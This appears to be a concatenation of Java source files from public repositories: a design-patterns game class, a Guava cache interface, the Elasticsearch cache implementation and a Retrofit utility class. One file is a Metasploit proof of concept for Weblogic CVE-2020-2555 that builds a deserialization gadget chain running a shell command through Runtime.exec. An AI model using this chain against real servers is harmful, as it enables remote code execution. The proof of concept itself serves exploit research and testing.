this.totalPoints += points;
printGameStatus();
}
void round(int timeSoFar, int totalTime) {
var start = System.currentTimeMillis();
var end = System.currentTimeMillis();
while (end - start + timeSoFar < totalTime && continueRound()) {
for (var i = 0; i < this.cells.length; i++) {
var points = 0;
var j = this.cells.length - 1;
while (this.cells[j][i].candy.getType().equals(Type.REWARD_FRUIT)) {
points = this.cells[j][i].candy.getPoints();
this.cells[j][i].crush(pool, this.cells);
handleChange(points);
}
}
for (var i = 0; i < this.cells.length; i++) {
var j = cells.length - 1;
var points = 0;
while (j > 0) {
points = this.cells[j][i].interact(this.cells[j - 1][i], this.pool, this.cells);
if (points != 0) {
handleChange(points);
} else {
j = j - 1;
}
}
}
for (Cell[] cell : this.cells) {
var j = 0;
var points = 0;
while (j < cells.length - 1) {
points = cell[j].interact(cell[j + 1], this.pool, this.cells);
if (points != 0) {
handleChange(points);
} else {
j = j + 1;
}
}
}
end = System.currentTimeMillis();
}
}
} | iluwatar/java-design-patterns | typeobjectpattern/src/main/java/com/iluwatar/typeobject/CandyGame.java |
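A hedged sketch of driving a round of the game above, placed in the same package because the CandyGame members are package-private. The CellPool constructor taking the number of pre-created cells is an assumption; only getNewCell() is visible here.
public class CandyGameDemo {
  public static void main(String[] args) {
    int size = 4;
    CandyGame game = new CandyGame(size, new CellPool(size * size)); // assumed CellPool constructor
    game.printGameStatus();
    game.round(0, 5000); // play for up to five seconds
    System.out.println("Total points: " + game.totalPoints);
  }
}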
1,102 | import com.tangosol.util.filter.LimitFilter;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
/*
* BadAttributeValueExpException.readObject()
* com.tangosol.util.filter.LimitFilter.toString()
* com.tangosol.util.extractor.ChainedExtractor.extract()
* com.tangosol.util.extractor.ReflectionExtractor.extract()
* Method.invoke()
* Runtime.exec()
*
* PoC by Y4er
*/
public class Weblogic_2555
{
public static void main(String args[]) throws Exception
{
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
LimitFilter limitFilter = new LimitFilter();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExt);
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, limitFilter);
// Serialize object & save to file
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(badAttributeValueExpException);
os.close();
}
}
| rapid7/metasploit-framework | data/exploits/CVE-2020-2555/Weblogic_2555.java |
1,103 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.cache;
import com.google.common.annotations.GwtCompatible;
/**
* Calculates the weights of cache entries.
*
* @author Charles Fry
* @since 11.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public interface Weigher<K, V> {
/**
* Returns the weight of a cache entry. There is no unit for entry weights; rather they are simply
* relative to each other.
*
* @return the weight of the entry; must be non-negative
*/
int weigh(K key, V value);
}
| google/guava | android/guava/src/com/google/common/cache/Weigher.java |
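A small example of wiring a Weigher into Guava's CacheBuilder: maximumWeight() sets the total weight budget (not an entry count) and the weigher lambda decides how much each entry contributes. The key/value types and weights here are arbitrary.
import com.google.common.cache.Cache;
import com.google.common.cache.CacheBuilder;

public class WeigherExample {
  public static void main(String[] args) {
    Cache<String, String> cache = CacheBuilder.newBuilder()
        .maximumWeight(10_000)                                  // evict once the total weight exceeds this
        .weigher((String key, String value) -> value.length())  // weight of an entry = size of its value
        .build();
    cache.put("greeting", "hello world");
    System.out.println(cache.getIfPresent("greeting"));
  }
}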
1,104 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.common.cache;
import org.elasticsearch.core.Tuple;
import java.lang.reflect.Array;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.atomic.LongAdder;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReadWriteLock;
import java.util.concurrent.locks.ReentrantLock;
import java.util.concurrent.locks.ReentrantReadWriteLock;
import java.util.function.BiConsumer;
import java.util.function.BiFunction;
import java.util.function.Consumer;
import java.util.function.ToLongBiFunction;
/**
* A simple concurrent cache.
* <p>
* Cache is a simple concurrent cache that supports time-based and weight-based evictions, with notifications for all
* evictions. The design goals for this cache were simplicity and read performance. This means that we are willing to
* accept reduced write performance in exchange for easy-to-understand code. Cache statistics for hits, misses and
* evictions are exposed.
* <p>
* The design of the cache is relatively simple. The cache is segmented into 256 segments which are backed by HashMaps.
* Each segment is protected by a re-entrant read/write lock. The read/write locks permit multiple concurrent readers
 * without contention, and the segments give us write throughput without impacting readers (so readers are blocked only
* if they are reading a segment that a writer is writing to).
* <p>
* The LRU functionality is backed by a single doubly-linked list chaining the entries in order of insertion. This
* LRU list is protected by a lock that serializes all writes to it. There are opportunities for improvements
* here if write throughput is a concern.
* <ol>
* <li>LRU list mutations could be inserted into a blocking queue that a single thread is reading from
* and applying to the LRU list.</li>
* <li>Promotions could be deferred for entries that were "recently" promoted.</li>
* <li>Locks on the list could be taken per node being modified instead of globally.</li>
* </ol>
* <p>
* Evictions only occur after a mutation to the cache (meaning an entry promotion, a cache insertion, or a manual
* invalidation) or an explicit call to {@link #refresh()}.
*
* @param <K> The type of the keys
* @param <V> The type of the values
*/
public class Cache<K, V> {
private final LongAdder hits = new LongAdder();
private final LongAdder misses = new LongAdder();
private final LongAdder evictions = new LongAdder();
// positive if entries have an expiration
private long expireAfterAccessNanos = -1;
// true if entries can expire after access
private boolean entriesExpireAfterAccess;
// positive if entries have an expiration after write
private long expireAfterWriteNanos = -1;
// true if entries can expire after initial insertion
private boolean entriesExpireAfterWrite;
// the number of entries in the cache
private int count = 0;
// the weight of the entries in the cache
private long weight = 0;
// the maximum weight that this cache supports
private long maximumWeight = -1;
// the weigher of entries
private ToLongBiFunction<K, V> weigher = (k, v) -> 1;
// the removal callback
private RemovalListener<K, V> removalListener = notification -> {};
// use CacheBuilder to construct
Cache() {}
void setExpireAfterAccessNanos(long expireAfterAccessNanos) {
if (expireAfterAccessNanos <= 0) {
throw new IllegalArgumentException("expireAfterAccessNanos <= 0");
}
this.expireAfterAccessNanos = expireAfterAccessNanos;
this.entriesExpireAfterAccess = true;
}
// public for testing
public long getExpireAfterAccessNanos() {
return this.expireAfterAccessNanos;
}
void setExpireAfterWriteNanos(long expireAfterWriteNanos) {
if (expireAfterWriteNanos <= 0) {
throw new IllegalArgumentException("expireAfterWriteNanos <= 0");
}
this.expireAfterWriteNanos = expireAfterWriteNanos;
this.entriesExpireAfterWrite = true;
}
// pkg-private for testing
long getExpireAfterWriteNanos() {
return this.expireAfterWriteNanos;
}
void setMaximumWeight(long maximumWeight) {
if (maximumWeight < 0) {
throw new IllegalArgumentException("maximumWeight < 0");
}
this.maximumWeight = maximumWeight;
}
void setWeigher(ToLongBiFunction<K, V> weigher) {
Objects.requireNonNull(weigher);
this.weigher = weigher;
}
void setRemovalListener(RemovalListener<K, V> removalListener) {
Objects.requireNonNull(removalListener);
this.removalListener = removalListener;
}
/**
* The relative time used to track time-based evictions.
*
* @return the current relative time
*/
protected long now() {
// System.nanoTime takes non-negligible time, so we only use it if we need it
// use System.nanoTime because we want relative time, not absolute time
return entriesExpireAfterAccess || entriesExpireAfterWrite ? System.nanoTime() : 0;
}
// the state of an entry in the LRU list
enum State {
NEW,
EXISTING,
DELETED
}
private static final class Entry<K, V> {
final K key;
final V value;
final long writeTime;
volatile long accessTime;
Entry<K, V> before;
Entry<K, V> after;
State state = State.NEW;
Entry(K key, V value, long writeTime) {
this.key = key;
this.value = value;
this.writeTime = this.accessTime = writeTime;
}
}
/**
* A cache segment.
* <p>
* A CacheSegment is backed by a HashMap and is protected by a read/write lock.
*/
private final class CacheSegment {
// read/write lock protecting mutations to the segment
final ReadWriteLock segmentLock = new ReentrantReadWriteLock();
final Lock readLock = segmentLock.readLock();
final Lock writeLock = segmentLock.writeLock();
Map<K, CompletableFuture<Entry<K, V>>> map;
/**
     * get an entry from the segment; expired entries will be returned as null but not removed from the cache until the LRU
     * list is pruned or a manual {@link Cache#refresh()} is performed; however, a caller can request eager eviction of
     * expired entries via the eagerEvict flag
*
* @param key the key of the entry to get from the cache
* @param now the access time of this entry
* @param eagerEvict whether entries should be eagerly evicted on expiration
* @return the entry if there was one, otherwise null
*/
Entry<K, V> get(K key, long now, boolean eagerEvict) {
CompletableFuture<Entry<K, V>> future;
readLock.lock();
try {
future = map == null ? null : map.get(key);
} finally {
readLock.unlock();
}
if (future != null) {
Entry<K, V> entry;
try {
entry = future.get();
} catch (ExecutionException e) {
assert future.isCompletedExceptionally();
misses.increment();
return null;
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
if (isExpired(entry, now)) {
misses.increment();
if (eagerEvict) {
lruLock.lock();
try {
evictEntry(entry);
} finally {
lruLock.unlock();
}
}
return null;
} else {
hits.increment();
entry.accessTime = now;
return entry;
}
} else {
misses.increment();
return null;
}
}
/**
* put an entry into the segment
*
* @param key the key of the entry to add to the cache
* @param value the value of the entry to add to the cache
* @param now the access time of this entry
* @return a tuple of the new entry and the existing entry, if there was one otherwise null
*/
Tuple<Entry<K, V>, Entry<K, V>> put(K key, V value, long now) {
Entry<K, V> entry = new Entry<>(key, value, now);
Entry<K, V> existing = null;
writeLock.lock();
try {
try {
if (map == null) {
map = new HashMap<>();
}
CompletableFuture<Entry<K, V>> future = map.put(key, CompletableFuture.completedFuture(entry));
if (future != null) {
existing = future.handle((ok, ex) -> ok).get();
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
} finally {
writeLock.unlock();
}
return Tuple.tuple(entry, existing);
}
/**
* remove an entry from the segment
*
* @param key the key of the entry to remove from the cache
*/
void remove(K key) {
CompletableFuture<Entry<K, V>> future;
writeLock.lock();
try {
if (map == null) {
future = null;
} else {
future = map.remove(key);
if (map.isEmpty()) {
map = null;
}
}
} finally {
writeLock.unlock();
}
if (future != null) {
evictions.increment();
notifyWithInvalidated(future);
}
}
/**
* remove an entry from the segment iff the future is done and the value is equal to the
* expected value
*
* @param key the key of the entry to remove from the cache
* @param value the value expected to be associated with the key
* @param notify whether to trigger a removal notification if the entry has been removed
*/
void remove(K key, V value, boolean notify) {
CompletableFuture<Entry<K, V>> future;
boolean removed = false;
writeLock.lock();
try {
future = map == null ? null : map.get(key);
try {
if (future != null) {
if (future.isDone()) {
Entry<K, V> entry = future.get();
if (Objects.equals(value, entry.value)) {
removed = map.remove(key, future);
if (map.isEmpty()) {
map = null;
}
}
}
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
} finally {
writeLock.unlock();
}
if (future != null && removed) {
evictions.increment();
if (notify) {
notifyWithInvalidated(future);
}
}
}
}
public static final int NUMBER_OF_SEGMENTS = 256;
@SuppressWarnings("unchecked")
private final CacheSegment[] segments = (CacheSegment[]) Array.newInstance(CacheSegment.class, NUMBER_OF_SEGMENTS);
{
for (int i = 0; i < segments.length; i++) {
segments[i] = new CacheSegment();
}
}
Entry<K, V> head;
Entry<K, V> tail;
// lock protecting mutations to the LRU list
private final ReentrantLock lruLock = new ReentrantLock();
/**
* Returns the value to which the specified key is mapped, or null if this map contains no mapping for the key.
*
* @param key the key whose associated value is to be returned
* @return the value to which the specified key is mapped, or null if this map contains no mapping for the key
*/
public V get(K key) {
return get(key, now(), false);
}
private V get(K key, long now, boolean eagerEvict) {
CacheSegment segment = getCacheSegment(key);
Entry<K, V> entry = segment.get(key, now, eagerEvict);
if (entry == null) {
return null;
} else {
promote(entry, now);
return entry.value;
}
}
/**
* If the specified key is not already associated with a value (or is mapped to null), attempts to compute its
* value using the given mapping function and enters it into this map unless null. The load method for a given key
* will be invoked at most once.
*
     * Use of different {@link CacheLoader} implementations on the same key concurrently may result in only the first
     * loader function being called; the second caller will then receive the result provided by the first, including any
     * exceptions thrown during the execution of the first.
*
* @param key the key whose associated value is to be returned or computed for if non-existent
* @param loader the function to compute a value given a key
* @return the current (existing or computed) non-null value associated with the specified key
* @throws ExecutionException thrown if loader throws an exception or returns a null value
*/
public V computeIfAbsent(K key, CacheLoader<K, V> loader) throws ExecutionException {
long now = now();
// we have to eagerly evict expired entries or our putIfAbsent call below will fail
V value = get(key, now, true);
if (value == null) {
// we need to synchronize loading of a value for a given key; however, holding the segment lock while
// invoking load can lead to deadlock against another thread due to dependent key loading; therefore, we
// need a mechanism to ensure that load is invoked at most once, but we are not invoking load while holding
// the segment lock; to do this, we atomically put a future in the map that can load the value, and then
// get the value from this future on the thread that won the race to place the future into the segment map
final CacheSegment segment = getCacheSegment(key);
CompletableFuture<Entry<K, V>> future;
CompletableFuture<Entry<K, V>> completableFuture = new CompletableFuture<>();
segment.writeLock.lock();
try {
if (segment.map == null) {
segment.map = new HashMap<>();
}
future = segment.map.putIfAbsent(key, completableFuture);
} finally {
segment.writeLock.unlock();
}
BiFunction<? super Entry<K, V>, Throwable, ? extends V> handler = (ok, ex) -> {
if (ok != null) {
promote(ok, now);
return ok.value;
} else {
segment.writeLock.lock();
try {
CompletableFuture<Entry<K, V>> sanity = segment.map == null ? null : segment.map.get(key);
if (sanity != null && sanity.isCompletedExceptionally()) {
segment.map.remove(key);
if (segment.map.isEmpty()) {
segment.map = null;
}
}
} finally {
segment.writeLock.unlock();
}
return null;
}
};
CompletableFuture<V> completableValue;
if (future == null) {
future = completableFuture;
completableValue = future.handle(handler);
V loaded;
try {
loaded = loader.load(key);
} catch (Exception e) {
future.completeExceptionally(e);
throw new ExecutionException(e);
}
if (loaded == null) {
NullPointerException npe = new NullPointerException("loader returned a null value");
future.completeExceptionally(npe);
throw new ExecutionException(npe);
} else {
future.complete(new Entry<>(key, loaded, now));
}
} else {
completableValue = future.handle(handler);
}
try {
value = completableValue.get();
// check to ensure the future hasn't been completed with an exception
if (future.isCompletedExceptionally()) {
future.get(); // call get to force the exception to be thrown for other concurrent callers
throw new IllegalStateException("the future was completed exceptionally but no exception was thrown");
}
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
}
return value;
}
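    // Usage sketch (comment only). Construction goes through CacheBuilder as noted above;
    // the builder method names below are assumptions, not verified API:
    //
    //   Cache<String, Integer> lengths = CacheBuilder.<String, Integer>builder()
    //       .setMaximumWeight(1000)
    //       .build();
    //   Integer length = lengths.computeIfAbsent("elastic", key -> key.length());
    //
    // The loader runs at most once per key: concurrent callers for the same key share the
    // CompletableFuture that the winning thread placed into the segment map above.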
/**
* Associates the specified value with the specified key in this map. If the map previously contained a mapping for
* the key, the old value is replaced.
*
* @param key key with which the specified value is to be associated
* @param value value to be associated with the specified key
*/
public void put(K key, V value) {
long now = now();
put(key, value, now);
}
private void put(K key, V value, long now) {
CacheSegment segment = getCacheSegment(key);
Tuple<Entry<K, V>, Entry<K, V>> tuple = segment.put(key, value, now);
boolean replaced = false;
lruLock.lock();
try {
if (tuple.v2() != null && tuple.v2().state == State.EXISTING) {
if (unlink(tuple.v2())) {
replaced = true;
}
}
promote(tuple.v1(), now);
} finally {
lruLock.unlock();
}
if (replaced) {
removalListener.onRemoval(
new RemovalNotification<>(tuple.v2().key, tuple.v2().value, RemovalNotification.RemovalReason.REPLACED)
);
}
}
private void notifyWithInvalidated(CompletableFuture<Entry<K, V>> f) {
try {
Entry<K, V> entry = f.get();
lruLock.lock();
try {
delete(entry, RemovalNotification.RemovalReason.INVALIDATED);
} finally {
lruLock.unlock();
}
} catch (ExecutionException e) {
// ok
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
}
/**
* Invalidate the association for the specified key. A removal notification will be issued for invalidated
* entries with {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*
* @param key the key whose mapping is to be invalidated from the cache
*/
public void invalidate(K key) {
CacheSegment segment = getCacheSegment(key);
segment.remove(key);
}
/**
* Invalidate the entry for the specified key and value. If the value provided is not equal to the value in
* the cache, no removal will occur. A removal notification will be issued for invalidated
* entries with {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*
* @param key the key whose mapping is to be invalidated from the cache
* @param value the expected value that should be associated with the key
*/
public void invalidate(K key, V value) {
CacheSegment segment = getCacheSegment(key);
segment.remove(key, value, true);
}
/**
* Invalidate all cache entries. A removal notification will be issued for invalidated entries with
* {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*/
public void invalidateAll() {
Entry<K, V> h;
boolean[] haveSegmentLock = new boolean[NUMBER_OF_SEGMENTS];
lruLock.lock();
try {
try {
for (int i = 0; i < NUMBER_OF_SEGMENTS; i++) {
segments[i].segmentLock.writeLock().lock();
haveSegmentLock[i] = true;
}
h = head;
for (CacheSegment segment : segments) {
segment.map = null;
}
Entry<K, V> current = head;
while (current != null) {
current.state = State.DELETED;
current = current.after;
}
head = tail = null;
count = 0;
weight = 0;
} finally {
for (int i = NUMBER_OF_SEGMENTS - 1; i >= 0; i--) {
if (haveSegmentLock[i]) {
segments[i].segmentLock.writeLock().unlock();
}
}
}
} finally {
lruLock.unlock();
}
while (h != null) {
removalListener.onRemoval(new RemovalNotification<>(h.key, h.value, RemovalNotification.RemovalReason.INVALIDATED));
h = h.after;
}
}
/**
* Force any outstanding size-based and time-based evictions to occur
*/
public void refresh() {
long now = now();
lruLock.lock();
try {
evict(now);
} finally {
lruLock.unlock();
}
}
/**
* The number of entries in the cache.
*
* @return the number of entries in the cache
*/
public int count() {
return count;
}
/**
* The weight of the entries in the cache.
*
* @return the weight of the entries in the cache
*/
public long weight() {
return weight;
}
/**
* An LRU sequencing of the keys in the cache that supports removal. This sequence is not protected from mutations
     * to the cache (except for {@link Iterator#remove()}). The result of iteration under any other mutation is
* undefined.
*
* @return an LRU-ordered {@link Iterable} over the keys in the cache
*/
public Iterable<K> keys() {
return () -> new Iterator<>() {
private final CacheIterator iterator = new CacheIterator(head);
@Override
public boolean hasNext() {
return iterator.hasNext();
}
@Override
public K next() {
return iterator.next().key;
}
@Override
public void remove() {
iterator.remove();
}
};
}
/**
* An LRU sequencing of the values in the cache. This sequence is not protected from mutations
     * to the cache (except for {@link Iterator#remove()}). The result of iteration under any other mutation is
* undefined.
*
* @return an LRU-ordered {@link Iterable} over the values in the cache
*/
public Iterable<V> values() {
return () -> new Iterator<>() {
private final CacheIterator iterator = new CacheIterator(head);
@Override
public boolean hasNext() {
return iterator.hasNext();
}
@Override
public V next() {
return iterator.next().value;
}
@Override
public void remove() {
iterator.remove();
}
};
}
/**
     * Performs an action for each cache entry in the cache. While iterating over the cache entries this method is protected from
     * mutations that occur within the same cache segment by holding the segment's read lock for the duration of the iteration. As
     * such, the specified consumer should not try to modify the cache. Modifications that occur in already-traversed segments won't
     * be seen by the consumer, but modifications that occur in not-yet-traversed segments will be.
*
* @param consumer the {@link Consumer}
*/
public void forEach(BiConsumer<K, V> consumer) {
for (CacheSegment segment : segments) {
segment.readLock.lock();
try {
if (segment.map == null) {
continue;
}
for (CompletableFuture<Entry<K, V>> future : segment.map.values()) {
try {
if (future != null && future.isDone()) {
final Entry<K, V> entry = future.get();
consumer.accept(entry.key, entry.value);
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
}
} finally {
segment.readLock.unlock();
}
}
}
private class CacheIterator implements Iterator<Entry<K, V>> {
private Entry<K, V> current;
private Entry<K, V> next;
CacheIterator(Entry<K, V> head) {
current = null;
next = head;
}
@Override
public boolean hasNext() {
return next != null;
}
@Override
public Entry<K, V> next() {
current = next;
next = next.after;
return current;
}
@Override
public void remove() {
Entry<K, V> entry = current;
if (entry != null) {
CacheSegment segment = getCacheSegment(entry.key);
segment.remove(entry.key, entry.value, false);
lruLock.lock();
try {
current = null;
delete(entry, RemovalNotification.RemovalReason.INVALIDATED);
} finally {
lruLock.unlock();
}
}
}
}
/**
* The cache statistics tracking hits, misses and evictions. These are taken on a best-effort basis meaning that
* they could be out-of-date mid-flight.
*
* @return the current cache statistics
*/
public CacheStats stats() {
return new CacheStats(this.hits.sum(), misses.sum(), evictions.sum());
}
public static class CacheStats {
private final long hits;
private final long misses;
private final long evictions;
public CacheStats(long hits, long misses, long evictions) {
this.hits = hits;
this.misses = misses;
this.evictions = evictions;
}
public long getHits() {
return hits;
}
public long getMisses() {
return misses;
}
public long getEvictions() {
return evictions;
}
}
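// Illustrative usage sketch (not part of the original source): deriving a best-effort hit ratio from
// the counters exposed by stats(); "cache" is an assumed Cache instance.
//
// Cache.CacheStats stats = cache.stats();
// long lookups = stats.getHits() + stats.getMisses();
// double hitRatio = lookups == 0 ? 0.0 : (double) stats.getHits() / lookups;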
private void promote(Entry<K, V> entry, long now) {
boolean promoted = true;
lruLock.lock();
try {
switch (entry.state) {
case DELETED -> promoted = false;
case EXISTING -> relinkAtHead(entry);
case NEW -> linkAtHead(entry);
}
if (promoted) {
evict(now);
}
} finally {
lruLock.unlock();
}
}
private void evict(long now) {
assert lruLock.isHeldByCurrentThread();
while (tail != null && shouldPrune(tail, now)) {
evictEntry(tail);
}
}
private void evictEntry(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
CacheSegment segment = getCacheSegment(entry.key);
if (segment != null) {
segment.remove(entry.key, entry.value, false);
}
delete(entry, RemovalNotification.RemovalReason.EVICTED);
}
private void delete(Entry<K, V> entry, RemovalNotification.RemovalReason removalReason) {
assert lruLock.isHeldByCurrentThread();
if (unlink(entry)) {
removalListener.onRemoval(new RemovalNotification<>(entry.key, entry.value, removalReason));
}
}
private boolean shouldPrune(Entry<K, V> entry, long now) {
return exceedsWeight() || isExpired(entry, now);
}
private boolean exceedsWeight() {
return maximumWeight != -1 && weight > maximumWeight;
}
private boolean isExpired(Entry<K, V> entry, long now) {
return (entriesExpireAfterAccess && now - entry.accessTime > expireAfterAccessNanos)
|| (entriesExpireAfterWrite && now - entry.writeTime > expireAfterWriteNanos);
}
private boolean unlink(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
if (entry.state == State.EXISTING) {
final Entry<K, V> before = entry.before;
final Entry<K, V> after = entry.after;
if (before == null) {
// removing the head
assert head == entry;
head = after;
if (head != null) {
head.before = null;
}
} else {
// removing inner element
before.after = after;
entry.before = null;
}
if (after == null) {
// removing tail
assert tail == entry;
tail = before;
if (tail != null) {
tail.after = null;
}
} else {
// removing inner element
after.before = before;
entry.after = null;
}
count--;
weight -= weigher.applyAsLong(entry.key, entry.value);
entry.state = State.DELETED;
return true;
} else {
return false;
}
}
private void linkAtHead(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
Entry<K, V> h = head;
entry.before = null;
entry.after = head;
head = entry;
if (h == null) {
tail = entry;
} else {
h.before = entry;
}
count++;
weight += weigher.applyAsLong(entry.key, entry.value);
entry.state = State.EXISTING;
}
private void relinkAtHead(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
if (head != entry) {
unlink(entry);
linkAtHead(entry);
}
}
private CacheSegment getCacheSegment(K key) {
return segments[key.hashCode() & 0xff];
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/common/cache/Cache.java |
1,105 | /*
* Copyright (C) 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package retrofit2;
import java.io.IOException;
import java.lang.annotation.Annotation;
import java.lang.reflect.Array;
import java.lang.reflect.GenericArrayType;
import java.lang.reflect.GenericDeclaration;
import java.lang.reflect.Method;
import java.lang.reflect.ParameterizedType;
import java.lang.reflect.Type;
import java.lang.reflect.TypeVariable;
import java.lang.reflect.WildcardType;
import java.util.Arrays;
import java.util.NoSuchElementException;
import java.util.Objects;
import javax.annotation.Nullable;
import kotlin.Unit;
import okhttp3.ResponseBody;
import okio.Buffer;
final class Utils {
static final Type[] EMPTY_TYPE_ARRAY = new Type[0];
private Utils() {
// No instances.
}
static RuntimeException methodError(Method method, String message, Object... args) {
return methodError(method, null, message, args);
}
@SuppressWarnings("AnnotateFormatMethod")
static RuntimeException methodError(
Method method, @Nullable Throwable cause, String message, Object... args) {
message = String.format(message, args);
return new IllegalArgumentException(
message
+ "\n for method "
+ method.getDeclaringClass().getSimpleName()
+ "."
+ method.getName(),
cause);
}
static RuntimeException parameterError(
Method method, Throwable cause, int p, String message, Object... args) {
String paramDesc = Platform.reflection.describeMethodParameter(method, p);
return methodError(method, cause, message + " (" + paramDesc + ")", args);
}
static RuntimeException parameterError(Method method, int p, String message, Object... args) {
String paramDesc = Platform.reflection.describeMethodParameter(method, p);
return methodError(method, message + " (" + paramDesc + ")", args);
}
static Class<?> getRawType(Type type) {
Objects.requireNonNull(type, "type == null");
if (type instanceof Class<?>) {
// Type is a normal class.
return (Class<?>) type;
}
if (type instanceof ParameterizedType) {
ParameterizedType parameterizedType = (ParameterizedType) type;
// I'm not exactly sure why getRawType() returns Type instead of Class. Neal isn't either but
// suspects some pathological case related to nested classes exists.
Type rawType = parameterizedType.getRawType();
if (!(rawType instanceof Class)) throw new IllegalArgumentException();
return (Class<?>) rawType;
}
if (type instanceof GenericArrayType) {
Type componentType = ((GenericArrayType) type).getGenericComponentType();
return Array.newInstance(getRawType(componentType), 0).getClass();
}
if (type instanceof TypeVariable) {
// We could use the variable's bounds, but that won't work if there are multiple. Having a raw
// type that's more general than necessary is okay.
return Object.class;
}
if (type instanceof WildcardType) {
return getRawType(((WildcardType) type).getUpperBounds()[0]);
}
throw new IllegalArgumentException(
"Expected a Class, ParameterizedType, or "
+ "GenericArrayType, but <"
+ type
+ "> is of type "
+ type.getClass().getName());
}
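// Illustrative sketch (not part of the original source): erasing a generic type to its raw class.
// The Holder class and its "names" field are hypothetical; reflective exception handling is omitted.
//
// class Holder { List<String> names; }
// Type generic = Holder.class.getDeclaredField("names").getGenericType(); // List<String>
// Class<?> raw = getRawType(generic); // java.util.List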
/** Returns true if {@code a} and {@code b} are equal. */
static boolean equals(Type a, Type b) {
if (a == b) {
return true; // Also handles (a == null && b == null).
} else if (a instanceof Class) {
return a.equals(b); // Class already specifies equals().
} else if (a instanceof ParameterizedType) {
if (!(b instanceof ParameterizedType)) return false;
ParameterizedType pa = (ParameterizedType) a;
ParameterizedType pb = (ParameterizedType) b;
Object ownerA = pa.getOwnerType();
Object ownerB = pb.getOwnerType();
boolean ownersAreEqual = ownerA == ownerB || (ownerA != null && ownerA.equals(ownerB));
boolean rawTypesAreEqual = pa.getRawType().equals(pb.getRawType());
boolean typeArgumentsAreEqual =
Arrays.equals(pa.getActualTypeArguments(), pb.getActualTypeArguments());
return ownersAreEqual && rawTypesAreEqual && typeArgumentsAreEqual;
} else if (a instanceof GenericArrayType) {
if (!(b instanceof GenericArrayType)) return false;
GenericArrayType ga = (GenericArrayType) a;
GenericArrayType gb = (GenericArrayType) b;
return equals(ga.getGenericComponentType(), gb.getGenericComponentType());
} else if (a instanceof WildcardType) {
if (!(b instanceof WildcardType)) return false;
WildcardType wa = (WildcardType) a;
WildcardType wb = (WildcardType) b;
return Arrays.equals(wa.getUpperBounds(), wb.getUpperBounds())
&& Arrays.equals(wa.getLowerBounds(), wb.getLowerBounds());
} else if (a instanceof TypeVariable) {
if (!(b instanceof TypeVariable)) return false;
TypeVariable<?> va = (TypeVariable<?>) a;
TypeVariable<?> vb = (TypeVariable<?>) b;
return va.getGenericDeclaration() == vb.getGenericDeclaration()
&& va.getName().equals(vb.getName());
} else {
return false; // This isn't a type we support!
}
}
/**
* Returns the generic supertype for {@code supertype}. For example, given a class {@code
* IntegerSet}, the result for when supertype is {@code Set.class} is {@code Set<Integer>} and the
* result when the supertype is {@code Collection.class} is {@code Collection<Integer>}.
*/
static Type getGenericSupertype(Type context, Class<?> rawType, Class<?> toResolve) {
if (toResolve == rawType) return context;
// We skip searching through interfaces if unknown is an interface.
if (toResolve.isInterface()) {
Class<?>[] interfaces = rawType.getInterfaces();
for (int i = 0, length = interfaces.length; i < length; i++) {
if (interfaces[i] == toResolve) {
